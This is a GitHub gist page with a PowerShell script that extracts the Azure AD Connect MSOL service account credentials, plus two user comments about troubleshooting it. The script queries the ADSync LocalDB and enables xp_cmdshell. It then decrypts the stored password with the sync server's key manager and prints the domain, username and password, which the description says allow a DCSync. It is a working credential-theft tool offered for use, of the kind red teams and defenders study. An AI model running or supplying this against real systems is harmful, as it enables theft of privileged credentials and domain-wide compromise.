Skip to content

Instantly share code, notes, and snippets.

@xpn

xpn/azuread_decrypt_msol_v2.ps1

Created April 11, 2020 01:34
Show Gist options
  • Star 62 You must be signed in to star a gist
  • Fork 21 You must be signed in to fork a gist
  • Save xpn/f12b145dba16c2eebdd1c6829267b90c to your computer and use it in GitHub Desktop.
Save xpn/f12b145dba16c2eebdd1c6829267b90c to your computer and use it in GitHub Desktop.
Download ZIP
Updated method of dumping the MSOL service account (which allows a DCSync) used by Azure AD Connect Sync
Raw
azuread_decrypt_msol_v2.ps1
Write-Host "AD Connect Sync Credential Extract v2 (@_xpn_)"
Write-Host "`t[ Updated to support new cryptokey storage method ]`n"
$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Data Source=(localdb)\.\ADSync;Initial Catalog=ADSync"
try {
$client.Open()
} catch {
Write-Host "[!] Could not connect to localdb..."
return
}
Write-Host "[*] Querying ADSync localdb (mms_server_configuration)"
$cmd = $client.CreateCommand()
$cmd.CommandText = "SELECT keyset_id, instance_id, entropy FROM mms_server_configuration"
$reader = $cmd.ExecuteReader()
if ($reader.Read() -ne $true) {
Write-Host "[!] Error querying mms_server_configuration"
return
}
$key_id = $reader.GetInt32(0)
$instance_id = $reader.GetGuid(1)
$entropy = $reader.GetGuid(2)
$reader.Close()
Write-Host "[*] Querying ADSync localdb (mms_management_agent)"
$cmd = $client.CreateCommand()
$cmd.CommandText = "SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE ma_type = 'AD'"
$reader = $cmd.ExecuteReader()
if ($reader.Read() -ne $true) {
Write-Host "[!] Error querying mms_management_agent"
return
}
$config = $reader.GetString(0)
$crypted = $reader.GetString(1)
$reader.Close()
Write-Host "[*] Using xp_cmdshell to run some Powershell as the service user"
$cmd = $client.CreateCommand()
$cmd.CommandText = "EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'powershell.exe -c `"add-type -path ''C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll'';`$km = New-Object -TypeName Microsoft.DirectoryServices.MetadirectoryServices.Cryptography.KeyManager;`$km.LoadKeySet([guid]''$entropy'', [guid]''$instance_id'', $key_id);`$key = `$null;`$km.GetActiveCredentialKey([ref]`$key);`$key2 = `$null;`$km.GetKey(1, [ref]`$key2);`$decrypted = `$null;`$key2.DecryptBase64ToString(''$crypted'', [ref]`$decrypted);Write-Host `$decrypted`"'"
$reader = $cmd.ExecuteReader()
$decrypted = [string]::Empty
while ($reader.Read() -eq $true -and $reader.IsDBNull(0) -eq $false) {
$decrypted += $reader.GetString(0)
}
if ($decrypted -eq [string]::Empty) {
Write-Host "[!] Error using xp_cmdshell to launch our decryption powershell"
return
}
$domain = select-xml -Content $config -XPath "//parameter[@name='forest-login-domain']" | select @{Name = 'Domain'; Expression = {$_.node.InnerText}}
$username = select-xml -Content $config -XPath "//parameter[@name='forest-login-user']" | select @{Name = 'Username'; Expression = {$_.node.InnerText}}
$password = select-xml -Content $decrypted -XPath "//attribute" | select @{Name = 'Password'; Expression = {$_.node.InnerText}}
Write-Host "[*] Credentials incoming...`n"
Write-Host "Domain: $($domain.Domain)"
Write-Host "Username: $($username.Username)"
Write-Host "Password: $($password.Password)"
@aayla-secura
Copy link

I'm getting the same "Cannot find the file specified" error using this updated version as well as the old one:

[*] Using xp_cmdshell to run some Powershell as the service user
select-xml : Cannot convert value "Exception calling "LoadKeySet" with "3" argument(s): "The system cannot find the file 
specified. (Exception from HRESULT: 0x80070002)"At line:1 char:175+ ... 
.KeyManager;$km.LoadKeySet([guid]'...+                 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~    + CategoryInfo          : NotSpecified: (:) [], 
MethodInvocationException    + FullyQualifiedErrorId : FileNotFoundException Exception calling "GetActiveCredentialKey" 
with "1" argument(s): "Value does not fall within the expected range."At line:1 char:298+ ... a6db3', 1);$key = 
$null;$km.GetActiveCredentialKey([ref]$key);$key2 = ...+                             ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException    + FullyQualifiedErrorId : ArgumentException 
Exception calling "GetKey" with "2" argument(s): "Value does not fall within the expected range."At line:1 char:350+ ... 
dentialKey([ref]$key);$key2 = $null;$km.GetKey(1, [ref]$key2);$decryp ...+

Any ideas?

@fsacer
Copy link

fsacer commented Sep 20, 2022

I think you can use the old method then? also verify you're targeting correct LocalDB instance as seen on https://blog.xpnsec.com/azuread-connect-for-redteam/.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment